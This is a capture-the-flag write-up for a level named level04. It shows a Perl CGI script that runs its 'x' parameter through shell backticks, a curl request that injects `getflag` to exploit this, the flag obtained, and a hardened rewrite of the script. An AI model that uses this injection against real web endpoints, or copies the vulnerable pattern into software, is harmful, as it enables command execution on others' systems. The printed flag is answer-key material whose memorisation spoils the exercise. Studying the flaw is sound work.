# level04

1. We are given the Perl script `level04.pl`, which contains:

    ```perl
    #!/usr/bin/perl
    # localhost:4747
    use CGI qw{param};
    print "Content-type: text/html\n\n";
    sub x {
      $y = $_[0];
      print `echo $y 2>&1`;
    }
    x(param("x"));
    ```

2. The `localhost:4747` comment, together with what CGI scripts are for, hints that this script handles HTTP GET requests on port 4747.
3. For sending requests to that port, `curl` is a good choice.
4. The request looks like this (the script takes one input parameter, `x`):

    ```
    curl localhost:4747/level04.pl?x="any_text"
    ```

5. As output we get the same parameter we passed: the script prints it with `echo` inside Perl backticks, which hand the whole string to the shell. The shell performs command substitution on any backticks contained in the parameter, so let's exploit it!
6. Pass `getflag` as the parameter, with the backticks escaped so that our own shell does not expand them before the request is sent:

    ```
    curl -v localhost:4747/level04.pl?x=\`getflag\`
    ```

7. Executing the request gives the level05 flag: `ne2searoevaevoem4ov4ar8ap`
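For the defensive side, the root cause is that `$y` is interpolated into a string that Perl's backtick operator passes to `/bin/sh`. The following hardened rewrite of the handler is an added example (it is not part of the challenge files or of the original writeup); the `sanitize` and `echo_safe` subroutine names are my own choice. It keeps the observable behaviour (the value of `x` is echoed back) while never letting the parameter reach a shell.

```perl
#!/usr/bin/perl
# Hardened variant of level04.pl (added example, not the challenge's own file).
# The user-controlled parameter is validated against an allow-list and then
# printed directly, so no shell is ever involved.
use strict;
use warnings;
use CGI qw(param);

print "Content-type: text/plain\n\n";

# Accept only a short, conservative character set. Shell metacharacters
# (backticks, $, ;, |, &, quotes, newlines) are not in the class and are rejected.
sub sanitize {
    my ($raw) = @_;
    return undef unless defined $raw;
    return undef unless $raw =~ /\A[A-Za-z0-9 _.-]{1,64}\z/;
    return $raw;
}

# Echo the value back, or report a rejection; returns 1 on success, 0 otherwise.
sub echo_safe {
    my ($value) = @_;
    my $clean = sanitize($value);
    if (!defined $clean) {
        print "rejected\n";
        return 0;
    }
    # Print from Perl directly: no backticks, no /bin/sh.
    # If an external program were genuinely required, the list form
    # system('echo', $clean) also bypasses the shell, so every character of
    # $clean arrives as a literal argument rather than being re-parsed.
    print "$clean\n";
    return 1;
}

echo_safe(param('x'));
```

Two independent layers are at work: the allow-list regex rejects anything outside plain alphanumerics, and even a value that passed the regex is never re-interpreted by a shell because the script prints it itself (or would use the list form of `system`). Either layer on its own would have stopped the injection described above; together they also survive future edits that loosen the regex.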